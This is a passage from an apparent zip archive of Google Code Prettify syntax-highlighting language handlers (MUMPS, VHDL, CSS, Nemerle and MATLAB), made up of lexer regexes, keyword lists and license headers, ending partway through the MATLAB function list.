                         'D|DATA|'         +
                         'E|EXTRACT|'      +
                         'F|FIND|'         +
                         'FN|FNUMBER|'     +
                         'G|GET|'          +
                         'J|JUSTIFY|'      +
                         'L|LENGTH|'       +
                         'NA|NAME|'        +
                         'O|ORDER|'        +
                         'P|PIECE|'        +
                         'QL|QLENGTH|'     +
                         'QS|QSUBSCRIPT|'  +
                         'Q|QUERY|'        +
                         'R|RANDOM|'       +
                         'RE|REVERSE|'     +
                         'S|SELECT|'       +
                         'ST|STACK|'       +
                         'T|TEXT|'         +
                         'TR|TRANSLATE|'   +
                         'V|VIEW|'         * 
                         'Z[A-Z]*|';   

var intrinsic = intrinsicVariables + intrinsicFunctions;                  


var shortcutStylePatterns = [
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // A double or single quoted, possibly multi-line, string.
         [PR['PR_STRING'],      /^(?:"(?:[^"]|\\.)*")/, null, '"']
  ];

var fallthroughStylePatterns = [
         // A line comment that starts with ;
         [PR['PR_COMMENT'],     /^;[^\r\n]*/, null, ';'],
         // Add intrinsic variables and functions as declarations, there not really but it mean
         // they will hilighted differently from commands.
         [PR['PR_DECLARATION'], new RegExp('^(?:\\$(?:' + intrinsic + '))\\b', 'i'), null],
         // Add commands as keywords
         [PR['PR_KEYWORD'], new RegExp('^(?:[^\\$]' + commands + ')\\b', 'i'), null],
         // A number is a decimal real literal or in scientific notation. 
         [PR['PR_LITERAL'],
          /^[+-]?(?:(?:\.\d+|\d+(?:\.\d*)?)(?:E[+\-]?\d+)?)/i], 
         // An identifier
         [PR['PR_PLAIN'], /^[a-z][a-zA-Z0-9]*/i],
         // Exclude $ % and ^
         [PR['PR_PUNCTUATION'], /^[^\w\t\n\r\xA0\"\$;%\^]|_/]
  ];
// Can't use m as its already used for MatLab
PR.registerLangHandler(PR.createSimpleLexer(shortcutStylePatterns, fallthroughStylePatterns), ['mumps']);
})();
PK!U�
�#it_sanctum/js/prettify/lang-vhdl.jsnu&1i�/**
 * @license
 * Copyright (C) 2010 benoit@ryder.fr
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for VHDL '93.
 *
 * Based on the lexical grammar and keywords at
 * http://www.iis.ee.ethz.ch/~zimmi/download/vhdl93_syntax.html
 *
 * @author benoit@ryder.fr
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace
         [PR['PR_PLAIN'], /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0']
        ],
        [
         // String, character or bit string
         [PR['PR_STRING'], /^(?:[BOX]?"(?:[^\"]|"")*"|'.')/i],
         // Comment, from two dashes until end of line.
         [PR['PR_COMMENT'], /^--[^\r\n]*/],
         [PR['PR_KEYWORD'], /^(?:abs|access|after|alias|all|and|architecture|array|assert|attribute|begin|block|body|buffer|bus|case|component|configuration|constant|disconnect|downto|else|elsif|end|entity|exit|file|for|function|generate|generic|group|guarded|if|impure|in|inertial|inout|is|label|library|linkage|literal|loop|map|mod|nand|new|next|nor|not|null|of|on|open|or|others|out|package|port|postponed|procedure|process|pure|range|record|register|reject|rem|report|return|rol|ror|select|severity|shared|signal|sla|sll|sra|srl|subtype|then|to|transport|type|unaffected|units|until|use|variable|wait|when|while|with|xnor|xor)(?=[^\w-]|$)/i, null],
         // Type, predefined or standard
         [PR['PR_TYPE'], /^(?:bit|bit_vector|character|boolean|integer|real|time|string|severity_level|positive|natural|signed|unsigned|line|text|std_u?logic(?:_vector)?)(?=[^\w-]|$)/i, null],
         // Predefined attributes
         [PR['PR_TYPE'], /^\'(?:ACTIVE|ASCENDING|BASE|DELAYED|DRIVING|DRIVING_VALUE|EVENT|HIGH|IMAGE|INSTANCE_NAME|LAST_ACTIVE|LAST_EVENT|LAST_VALUE|LEFT|LEFTOF|LENGTH|LOW|PATH_NAME|POS|PRED|QUIET|RANGE|REVERSE_RANGE|RIGHT|RIGHTOF|SIMPLE_NAME|STABLE|SUCC|TRANSACTION|VAL|VALUE)(?=[^\w-]|$)/i, null],
         // Number, decimal or based literal
         [PR['PR_LITERAL'], /^\d+(?:_\d+)*(?:#[\w\\.]+#(?:[+\-]?\d+(?:_\d+)*)?|(?:\.\d+(?:_\d+)*)?(?:E[+\-]?\d+(?:_\d+)*)?)/i],
         // Identifier, basic or extended
         [PR['PR_PLAIN'], /^(?:[a-z]\w*|\\[^\\]*\\)/i],
         // Punctuation
         [PR['PR_PUNCTUATION'], /^[^\w\t\n\r \xA0\"\'][^\w\t\n\r \xA0\-\"\']*/]
        ]),
    ['vhdl', 'vhd']);
PK!���q77"it_sanctum/js/prettify/lang-css.jsnu&1i�/**
 * @license
 * Copyright (C) 2009 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for CSS.
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-css"></pre>
 *
 *
 * http://www.w3.org/TR/CSS21/grammar.html Section G2 defines the lexical
 * grammar.  This scheme does not recognize keywords containing escapes.
 *
 * @author mikesamuel@gmail.com
 */

// This file is a call to a function defined in prettify.js which defines a
// lexical scanner for CSS and maps tokens to styles.

// The call to PR['registerLangHandler'] is quoted so that Closure Compiler
// will not rename the call so that this language extensions can be
// compiled/minified separately from one another.  Other symbols defined in
// prettify.js are similarly quoted.

// The call is structured thus:
// PR['registerLangHandler'](
//    PR['createSimpleLexer'](
//        shortcutPatterns,
//        fallThroughPatterns),
//    [languageId0, ..., languageIdN])

// Langugage IDs
// =============
// The language IDs are typically the file extensions of source files for
// that language so that users can syntax highlight arbitrary files based
// on just the extension.  This is heuristic, but works pretty well in
// practice.

// Patterns
// ========
// Lexers are typically implemented as a set of regular expressions.
// The SimpleLexer function takes regular expressions, styles, and some
// pragma-info and produces a lexer.  A token description looks like
//   [STYLE_NAME, /regular-expression/, pragmas]

// Initially, simple lexer's inner loop looked like:

//    while sourceCode is not empty:
//      try each regular expression in order until one matches
//      remove the matched portion from sourceCode

// This was really slow for large files because some JS interpreters
// do a buffer copy on the matched portion which is O(n*n)

// The current loop now looks like

//    1. use js-modules/combinePrefixPatterns.js to 
//       combine all regular expressions into one 
//    2. use a single global regular expresion match to extract all tokens
//    3. for each token try regular expressions in order until one matches it
//       and classify it using the associated style

// This is a lot more efficient but it does mean that lookahead and lookbehind
// can't be used across boundaries to classify tokens.

// Sometimes we need lookahead and lookbehind and sometimes we want to handle
// embedded language -- JavaScript or CSS embedded in HTML, or inline assembly
// in C.

// If a particular pattern has a numbered group, and its style pattern starts
// with "lang-" as in
//    ['lang-js', /<script>(.*?)<\/script>/]
// then the token classification step breaks the token into pieces.
// Group 1 is re-parsed using the language handler for "lang-js", and the
// surrounding portions are reclassified using the current language handler.
// This mechanism gives us both lookahead, lookbehind, and language embedding.

// Shortcut Patterns
// =================
// A shortcut pattern is one that is tried before other patterns if the first
// character in the token is in the string of characters.
// This very effectively lets us make quick correct decisions for common token
// types.

// All other patterns are fall-through patterns.



// The comments inline below refer to productions in the CSS specification's
// lexical grammar.  See link above.
PR['registerLangHandler'](
    PR['createSimpleLexer'](
        // Shortcut patterns.
        [
         // The space production <s>
         [PR['PR_PLAIN'],       /^[ \t\r\n\f]+/, null, ' \t\r\n\f']
        ],
        // Fall-through patterns.
        [
         // Quoted strings.  <string1> and <string2>
         [PR['PR_STRING'],
          /^\"(?:[^\n\r\f\\\"]|\\(?:\r\n?|\n|\f)|\\[\s\S])*\"/, null],
         [PR['PR_STRING'],
          /^\'(?:[^\n\r\f\\\']|\\(?:\r\n?|\n|\f)|\\[\s\S])*\'/, null],
         ['lang-css-str', /^url\(([^\)\"\']+)\)/i],
         [PR['PR_KEYWORD'],
          /^(?:url|rgb|\!important|@import|@page|@media|@charset|inherit)(?=[^\-\w]|$)/i,
          null],
         // A property name -- an identifier followed by a colon.
         ['lang-css-kw', /^(-?(?:[_a-z]|(?:\\[0-9a-f]+ ?))(?:[_a-z0-9\-]|\\(?:\\[0-9a-f]+ ?))*)\s*:/i],
         // A C style block comment.  The <comment> production.
         [PR['PR_COMMENT'], /^\/\*[^*]*\*+(?:[^\/*][^*]*\*+)*\//],
         // Escaping text spans
         [PR['PR_COMMENT'], /^(?:<!--|-->)/],
         // A number possibly containing a suffix.
         [PR['PR_LITERAL'], /^(?:\d+|\d*\.\d+)(?:%|[a-z]+)?/i],
         // A hex color
         [PR['PR_LITERAL'], /^#(?:[0-9a-f]{3}){1,2}\b/i],
         // An identifier
         [PR['PR_PLAIN'],
          /^-?(?:[_a-z]|(?:\\[\da-f]+ ?))(?:[_a-z\d\-]|\\(?:\\[\da-f]+ ?))*/i],
         // A run of punctuation
         [PR['PR_PUNCTUATION'], /^[^\s\w\'\"]+/]
        ]),
    ['css']);
// Above we use embedded languages to highlight property names (identifiers
// followed by a colon) differently from identifiers in values.
PR['registerLangHandler'](
    PR['createSimpleLexer']([],
        [
         [PR['PR_KEYWORD'],
          /^-?(?:[_a-z]|(?:\\[\da-f]+ ?))(?:[_a-z\d\-]|\\(?:\\[\da-f]+ ?))*/i]
        ]),
    ['css-kw']);
// The content of an unquoted URL literal like url(http://foo/img.png) should
// be colored as string content.  This language handler is used above in the
// URL production to do so.
PR['registerLangHandler'](
    PR['createSimpleLexer']([],
        [
         [PR['PR_STRING'], /^[^\)\"\']+/]
        ]),
    ['css-str']);
PK!
f��66 it_sanctum/js/prettify/lang-n.jsnu&1i�/**
 * @license
 * Copyright (C) 2011 Zimin A.V.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for the Nemerle language.
 * http://nemerle.org
 * @author Zimin A.V.
 */
(function () {
  // http://nemerle.org/wiki/index.php?title=Base_keywords
  var keywords = 'abstract|and|as|base|catch|class|def|delegate|enum|event|extern|false|finally|'
         + 'fun|implements|interface|internal|is|macro|match|matches|module|mutable|namespace|new|'
         + 'null|out|override|params|partial|private|protected|public|ref|sealed|static|struct|'
         + 'syntax|this|throw|true|try|type|typeof|using|variant|virtual|volatile|when|where|with|'
         + 'assert|assert2|async|break|checked|continue|do|else|ensures|for|foreach|if|late|lock|new|nolate|'
         + 'otherwise|regexp|repeat|requires|return|surroundwith|unchecked|unless|using|while|yield';

  PR['registerLangHandler'](PR['createSimpleLexer'](
      // shortcutStylePatterns
      [
        [PR['PR_STRING'], /^(?:\'(?:[^\\\'\r\n]|\\.)*\'|\"(?:[^\\\"\r\n]|\\.)*(?:\"|$))/, null, '"'],
        [PR['PR_COMMENT'], /^#(?:(?:define|elif|else|endif|error|ifdef|include|ifndef|line|pragma|undef|warning)\b|[^\r\n]*)/, null, '#'],
        [PR['PR_PLAIN'], /^\s+/, null, ' \r\n\t\xA0']
      ],
      // fallthroughStylePatterns
      [
        [PR['PR_STRING'], /^@\"(?:[^\"]|\"\")*(?:\"|$)/, null],
        [PR['PR_STRING'], /^<#(?:[^#>])*(?:#>|$)/, null],
        [PR['PR_STRING'], /^<(?:(?:(?:\.\.\/)*|\/?)(?:[\w-]+(?:\/[\w-]+)+)?[\w-]+\.h|[a-z]\w*)>/, null],
        [PR['PR_COMMENT'], /^\/\/[^\r\n]*/, null],
        [PR['PR_COMMENT'], /^\/\*[\s\S]*?(?:\*\/|$)/, null],
        [PR['PR_KEYWORD'], new RegExp('^(?:' + keywords + ')\\b'), null],
        [PR['PR_TYPE'], /^(?:array|bool|byte|char|decimal|double|float|int|list|long|object|sbyte|short|string|ulong|uint|ufloat|ulong|ushort|void)\b/, null],
        [PR['PR_LITERAL'], /^@[a-z_$][a-z_$@0-9]*/i, null],
        [PR['PR_TYPE'], /^@[A-Z]+[a-z][A-Za-z_$@0-9]*/, null],
        [PR['PR_PLAIN'], /^'?[A-Za-z_$][a-z_$@0-9]*/i, null],
        [PR['PR_LITERAL'], new RegExp(
             '^(?:'
  // A hex number
             + '0x[a-f0-9]+'
  // or an octal or decimal number,
             + '|(?:\\d(?:_\\d+)*\\d*(?:\\.\\d*)?|\\.\\d\\+)'
  // possibly in scientific notation
             + '(?:e[+\\-]?\\d+)?'
             + ')'
  // with an optional modifier like UL for unsigned long
             + '[a-z]*', 'i'), null, '0123456789'],

        [PR['PR_PUNCTUATION'], /^.[^\s\w\.$@\'\"\`\/\#]*/, null]
      ]),
      ['n', 'nemerle']);
})();
PK!*=�LGdGd%it_sanctum/js/prettify/lang-matlab.jsnu&1i�/**
 * @license
 * Copyright (c) 2013 by Amro <amroamroamro@gmail.com>
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

/**
 * @fileoverview
 * Registers a language handler for MATLAB.
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code inside an HTML tag like
 *     <pre class="prettyprint lang-matlab">
 *     </pre>
 *
 * @see https://github.com/amroamroamro/prettify-matlab
 */
(function (PR) {
  /*
    PR_PLAIN: plain text
    PR_STRING: string literals
    PR_KEYWORD: keywords
    PR_COMMENT: comments
    PR_TYPE: types
    PR_LITERAL: literal values (1, null, true, ..)
    PR_PUNCTUATION: punctuation string
    PR_SOURCE: embedded source
    PR_DECLARATION: markup declaration such as a DOCTYPE
    PR_TAG: sgml tag
    PR_ATTRIB_NAME: sgml attribute name
    PR_ATTRIB_VALUE: sgml attribute value
  */
  var PR_IDENTIFIER = "ident",
    PR_CONSTANT = "const",
    PR_FUNCTION = "fun",
    PR_FUNCTION_TOOLBOX = "fun_tbx",
    PR_SYSCMD = "syscmd",
    PR_CODE_OUTPUT = "codeoutput",
    PR_ERROR = "err",
    PR_WARNING = "wrn",
    PR_TRANSPOSE = "transpose",
    PR_LINE_CONTINUATION = "linecont";

  // Refer to: http://www.mathworks.com/help/matlab/functionlist-alpha.html
  var coreFunctions = [
    'abs|accumarray|acos(?:d|h)?|acot(?:d|h)?|acsc(?:d|h)?|actxcontrol(?:list|select)?|actxGetRunningServer|actxserver|addlistener|addpath|addpref|addtodate|airy|align|alim|all|allchild|alpha|alphamap|amd|ancestor|and|angle|annotation|any|area|arrayfun|asec(?:d|h)?|asin(?:d|h)?|assert|assignin|atan(?:2|d|h)?|audiodevinfo|audioplayer|audiorecorder|aufinfo|auread|autumn|auwrite|avifile|aviinfo|aviread|axes|axis|balance|bar(?:3|3h|h)?|base2dec|beep|BeginInvoke|bench|bessel(?:h|i|j|k|y)|beta|betainc|betaincinv|betaln|bicg|bicgstab|bicgstabl|bin2dec|bitand|bitcmp|bitget|bitmax|bitnot|bitor|bitset|bitshift|bitxor|blanks|blkdiag|bone|box|brighten|brush|bsxfun|builddocsearchdb|builtin|bvp4c|bvp5c|bvpget|bvpinit|bvpset|bvpxtend|calendar|calllib|callSoapService|camdolly|cameratoolbar|camlight|camlookat|camorbit|campan|campos|camproj|camroll|camtarget|camup|camva|camzoom|cart2pol|cart2sph|cast|cat|caxis|cd|cdf2rdf|cdfepoch|cdfinfo|cdflib(?:\.(?:close|closeVar|computeEpoch|computeEpoch16|create|createAttr|createVar|delete|deleteAttr|deleteAttrEntry|deleteAttrgEntry|deleteVar|deleteVarRecords|epoch16Breakdown|epochBreakdown|getAttrEntry|getAttrgEntry|getAttrMaxEntry|getAttrMaxgEntry|getAttrName|getAttrNum|getAttrScope|getCacheSize|getChecksum|getCompression|getCompressionCacheSize|getConstantNames|getConstantValue|getCopyright|getFileBackward|getFormat|getLibraryCopyright|getLibraryVersion|getMajority|getName|getNumAttrEntries|getNumAttrgEntries|getNumAttributes|getNumgAttributes|getReadOnlyMode|getStageCacheSize|getValidate|getVarAllocRecords|getVarBlockingFactor|getVarCacheSize|getVarCompression|getVarData|getVarMaxAllocRecNum|getVarMaxWrittenRecNum|getVarName|getVarNum|getVarNumRecsWritten|getVarPadValue|getVarRecordData|getVarReservePercent|getVarsMaxWrittenRecNum|getVarSparseRecords|getVersion|hyperGetVarData|hyperPutVarData|inquire|inquireAttr|inquireAttrEntry|inquireAttrgEntry|inquireVar|open|putAttrEntry|putAttrgEntry|putVarData|putVarRecordData|renameAttr|renameVar|setCacheSize|setChecksum|setCompression|setCompressionCacheSize|setFileBackward|setFormat|setMajority|setReadOnlyMode|setStageCacheSize|setValidate|setVarAllocBlockRecords|setVarBlockingFactor|setVarCacheSize|setVarCompression|setVarInitialRecs|setVarPadValue|SetVarReservePercent|setVarsCacheSize|setVarSparseRecords))?|cdfread|cdfwrite|ceil|cell2mat|cell2struct|celldisp|cellfun|cellplot|cellstr|cgs|checkcode|checkin|checkout|chol|cholinc|cholupdate|circshift|cla|clabel|class|clc|clear|clearvars|clf|clipboard|clock|close|closereq|cmopts|cmpermute|cmunique|colamd|colon|colorbar|colordef|colormap|colormapeditor|colperm|Combine|comet|comet3|commandhistory|commandwindow|compan|compass|complex|computer|cond|condeig|condest|coneplot|conj|containers\.Map|contour(?:3|c|f|slice)?|contrast|conv|conv2|convhull|convhulln|convn|cool|copper|copyfile|copyobj|corrcoef|cos(?:d|h)?|cot(?:d|h)?|cov|cplxpair|cputime|createClassFromWsdl|createSoapMessage|cross|csc(?:d|h)?|csvread|csvwrite|ctranspose|cumprod|cumsum|cumtrapz|curl|customverctrl|cylinder|daqread|daspect|datacursormode|datatipinfo|date|datenum|datestr|datetick|datevec|dbclear|dbcont|dbdown|dblquad|dbmex|dbquit|dbstack|dbstatus|dbstep|dbstop|dbtype|dbup|dde23|ddeget|ddesd|ddeset|deal|deblank|dec2base|dec2bin|dec2hex|decic|deconv|del2|delaunay|delaunay3|delaunayn|DelaunayTri|delete|demo|depdir|depfun|det|detrend|deval|diag|dialog|diary|diff|diffuse|dir|disp|display|dither|divergence|dlmread|dlmwrite|dmperm|doc|docsearch|dos|dot|dragrect|drawnow|dsearch|dsearchn|dynamicprops|echo|echodemo|edit|eig|eigs|ellipj|ellipke|ellipsoid|empty|enableNETfromNetworkDrive|enableservice|EndInvoke|enumeration|eomday|eq|erf|erfc|erfcinv|erfcx|erfinv|error|errorbar|errordlg|etime|etree|etreeplot|eval|evalc|evalin|event\.(?:EventData|listener|PropertyEvent|proplistener)|exifread|exist|exit|exp|expint|expm|expm1|export2wsdlg|eye|ezcontour|ezcontourf|ezmesh|ezmeshc|ezplot|ezplot3|ezpolar|ezsurf|ezsurfc|factor|factorial|fclose|feather|feature|feof|ferror|feval|fft|fft2|fftn|fftshift|fftw|fgetl|fgets|fieldnames|figure|figurepalette|fileattrib|filebrowser|filemarker|fileparts|fileread|filesep|fill|fill3|filter|filter2|find|findall|findfigs|findobj|findstr|finish|fitsdisp|fitsinfo|fitsread|fitswrite|fix|flag|flipdim|fliplr|flipud|floor|flow|fminbnd|fminsearch|fopen|format|fplot|fprintf|frame2im|fread|freqspace|frewind|fscanf|fseek|ftell|FTP|full|fullfile|func2str|functions|funm|fwrite|fzero|gallery|gamma|gammainc|gammaincinv|gammaln|gca|gcbf|gcbo|gcd|gcf|gco|ge|genpath|genvarname|get|getappdata|getenv|getfield|getframe|getpixelposition|getpref|ginput|gmres|gplot|grabcode|gradient|gray|graymon|grid|griddata(?:3|n)?|griddedInterpolant|gsvd|gt|gtext|guidata|guide|guihandles|gunzip|gzip|h5create|h5disp|h5info|h5read|h5readatt|h5write|h5writeatt|hadamard|handle|hankel|hdf|hdf5|hdf5info|hdf5read|hdf5write|hdfinfo|hdfread|hdftool|help|helpbrowser|helpdesk|helpdlg|helpwin|hess|hex2dec|hex2num|hgexport|hggroup|hgload|hgsave|hgsetget|hgtransform|hidden|hilb|hist|histc|hold|home|horzcat|hostid|hot|hsv|hsv2rgb|hypot|ichol|idivide|ifft|ifft2|ifftn|ifftshift|ilu|im2frame|im2java|imag|image|imagesc|imapprox|imfinfo|imformats|import|importdata|imread|imwrite|ind2rgb|ind2sub|inferiorto|info|inline|inmem|inpolygon|input|inputdlg|inputname|inputParser|inspect|instrcallback|instrfind|instrfindall|int2str|integral(?:2|3)?|interp(?:1|1q|2|3|ft|n)|interpstreamspeed|intersect|intmax|intmin|inv|invhilb|ipermute|isa|isappdata|iscell|iscellstr|ischar|iscolumn|isdir|isempty|isequal|isequaln|isequalwithequalnans|isfield|isfinite|isfloat|isglobal|ishandle|ishghandle|ishold|isinf|isinteger|isjava|iskeyword|isletter|islogical|ismac|ismatrix|ismember|ismethod|isnan|isnumeric|isobject|isocaps|isocolors|isonormals|isosurface|ispc|ispref|isprime|isprop|isreal|isrow|isscalar|issorted|isspace|issparse|isstr|isstrprop|isstruct|isstudent|isunix|isvarname|isvector|javaaddpath|javaArray|javachk|javaclasspath|javacomponent|javaMethod|javaMethodEDT|javaObject|javaObjectEDT|javarmpath|jet|keyboard|kron|lasterr|lasterror|lastwarn|lcm|ldivide|ldl|le|legend|legendre|length|libfunctions|libfunctionsview|libisloaded|libpointer|libstruct|license|light|lightangle|lighting|lin2mu|line|lines|linkaxes|linkdata|linkprop|linsolve|linspace|listdlg|listfonts|load|loadlibrary|loadobj|log|log10|log1p|log2|loglog|logm|logspace|lookfor|lower|ls|lscov|lsqnonneg|lsqr|lt|lu|luinc|magic|makehgtform|mat2cell|mat2str|material|matfile|matlab\.io\.MatFile|matlab\.mixin\.(?:Copyable|Heterogeneous(?:\.getDefaultScalarElement)?)|matlabrc|matlabroot|max|maxNumCompThreads|mean|median|membrane|memmapfile|memory|menu|mesh|meshc|meshgrid|meshz|meta\.(?:class(?:\.fromName)?|DynamicProperty|EnumeratedValue|event|MetaData|method|package(?:\.(?:fromName|getAllPackages))?|property)|metaclass|methods|methodsview|mex(?:\.getCompilerConfigurations)?|MException|mexext|mfilename|min|minres|minus|mislocked|mkdir|mkpp|mldivide|mlint|mlintrpt|mlock|mmfileinfo|mmreader|mod|mode|more|move|movefile|movegui|movie|movie2avi|mpower|mrdivide|msgbox|mtimes|mu2lin|multibandread|multibandwrite|munlock|namelengthmax|nargchk|narginchk|nargoutchk|native2unicode|nccreate|ncdisp|nchoosek|ncinfo|ncread|ncreadatt|ncwrite|ncwriteatt|ncwriteschema|ndgrid|ndims|ne|NET(?:\.(?:addAssembly|Assembly|convertArray|createArray|createGeneric|disableAutoRelease|enableAutoRelease|GenericClass|invokeGenericMethod|NetException|setStaticProperty))?|netcdf\.(?:abort|close|copyAtt|create|defDim|defGrp|defVar|defVarChunking|defVarDeflate|defVarFill|defVarFletcher32|delAtt|endDef|getAtt|getChunkCache|getConstant|getConstantNames|getVar|inq|inqAtt|inqAttID|inqAttName|inqDim|inqDimID|inqDimIDs|inqFormat|inqGrpName|inqGrpNameFull|inqGrpParent|inqGrps|inqLibVers|inqNcid|inqUnlimDims|inqVar|inqVarChunking|inqVarDeflate|inqVarFill|inqVarFletcher32|inqVarID|inqVarIDs|open|putAtt|putVar|reDef|renameAtt|renameDim|renameVar|setChunkCache|setDefaultFormat|setFill|sync)|newplot|nextpow2|nnz|noanimate|nonzeros|norm|normest|not|notebook|now|nthroot|null|num2cell|num2hex|num2str|numel|nzmax|ode(?:113|15i|15s|23|23s|23t|23tb|45)|odeget|odeset|odextend|onCleanup|ones|open|openfig|opengl|openvar|optimget|optimset|or|ordeig|orderfields|ordqz|ordschur|orient|orth|pack|padecoef|pagesetupdlg|pan|pareto|parseSoapResponse|pascal|patch|path|path2rc|pathsep|pathtool|pause|pbaspect|pcg|pchip|pcode|pcolor|pdepe|pdeval|peaks|perl|perms|permute|pie|pink|pinv|planerot|playshow|plot|plot3|plotbrowser|plotedit|plotmatrix|plottools|plotyy|plus|pol2cart|polar|poly|polyarea|polyder|polyeig|polyfit|polyint|polyval|polyvalm|pow2|power|ppval|prefdir|preferences|primes|print|printdlg|printopt|printpreview|prod|profile|profsave|propedit|propertyeditor|psi|publish|PutCharArray|PutFullMatrix|PutWorkspaceData|pwd|qhull|qmr|qr|qrdelete|qrinsert|qrupdate|quad|quad2d|quadgk|quadl|quadv|questdlg|quit|quiver|quiver3|qz|rand|randi|randn|randperm|RandStream(?:\.(?:create|getDefaultStream|getGlobalStream|list|setDefaultStream|setGlobalStream))?|rank|rat|rats|rbbox|rcond|rdivide|readasync|real|reallog|realmax|realmin|realpow|realsqrt|record|rectangle|rectint|recycle|reducepatch|reducevolume|refresh|refreshdata|regexp|regexpi|regexprep|regexptranslate|rehash|rem|Remove|RemoveAll|repmat|reset|reshape|residue|restoredefaultpath|rethrow|rgb2hsv|rgb2ind|rgbplot|ribbon|rmappdata|rmdir|rmfield|rmpath|rmpref|rng|roots|rose|rosser|rot90|rotate|rotate3d|round|rref|rsf2csf|run|save|saveas|saveobj|savepath|scatter|scatter3|schur|sec|secd|sech|selectmoveresize|semilogx|semilogy|sendmail|serial|set|setappdata|setdiff|setenv|setfield|setpixelposition|setpref|setstr|setxor|shading|shg|shiftdim|showplottool|shrinkfaces|sign|sin(?:d|h)?|size|slice|smooth3|snapnow|sort|sortrows|sound|soundsc|spalloc|spaugment|spconvert|spdiags|specular|speye|spfun|sph2cart|sphere|spinmap|spline|spones|spparms|sprand|sprandn|sprandsym|sprank|spring|sprintf|spy|sqrt|sqrtm|squeeze|ss2tf|sscanf|stairs|startup|std|stem|stem3|stopasync|str2double|str2func|str2mat|str2num|strcat|strcmp|strcmpi|stream2|stream3|streamline|streamparticles|streamribbon|streamslice|streamtube|strfind|strjust|strmatch|strncmp|strncmpi|strread|strrep|strtok|strtrim|struct2cell|structfun|strvcat|sub2ind|subplot|subsasgn|subsindex|subspace|subsref|substruct|subvolume|sum|summer|superclasses|superiorto|support|surf|surf2patch|surface|surfc|surfl|surfnorm|svd|svds|swapbytes|symamd|symbfact|symmlq|symrcm|symvar|system|tan(?:d|h)?|tar|tempdir|tempname|tetramesh|texlabel|text|textread|textscan|textwrap|tfqmr|throw|tic|Tiff(?:\.(?:getTagNames|getVersion))?|timer|timerfind|timerfindall|times|timeseries|title|toc|todatenum|toeplitz|toolboxdir|trace|transpose|trapz|treelayout|treeplot|tril|trimesh|triplequad|triplot|TriRep|TriScatteredInterp|trisurf|triu|tscollection|tsearch|tsearchn|tstool|type|typecast|uibuttongroup|uicontextmenu|uicontrol|uigetdir|uigetfile|uigetpref|uiimport|uimenu|uiopen|uipanel|uipushtool|uiputfile|uiresume|uisave|uisetcolor|uisetfont|uisetpref|uistack|uitable|uitoggletool|uitoolbar|uiwait|uminus|undocheckout|unicode2native|union|unique|unix|unloadlibrary|unmesh|unmkpp|untar|unwrap|unzip|uplus|upper|urlread|urlwrite|usejava|userpath|validateattributes|validatestring|vander|var|vectorize|ver|verctrl|verLessThan|version|vertcat|VideoReader(?:\.isPlatformSupported)?|VideoWriter(?:\.getProfiles)?|view|viewmtx|visdiff|volumebounds|voronoi|voronoin|wait|waitbar|waitfor|waitforbuttonpress|warndlg|warning|waterfall|wavfinfo|wavplay|wavread|wavrecord|wavwrite|web|weekday|what|whatsnew|which|whitebg|who|whos|wilkinson|winopen|winqueryreg|winter|wk1finfo|wk1read|wk1write|workspace|xlabel|xlim|xlsfinfo|xlsread|xlswrite|xmlread|xmlwrite|xor|xslt|ylabel|ylim|zeros|zip|zlabel|zlim|zoom'
  ].join("|");
  var statsFunctions = [
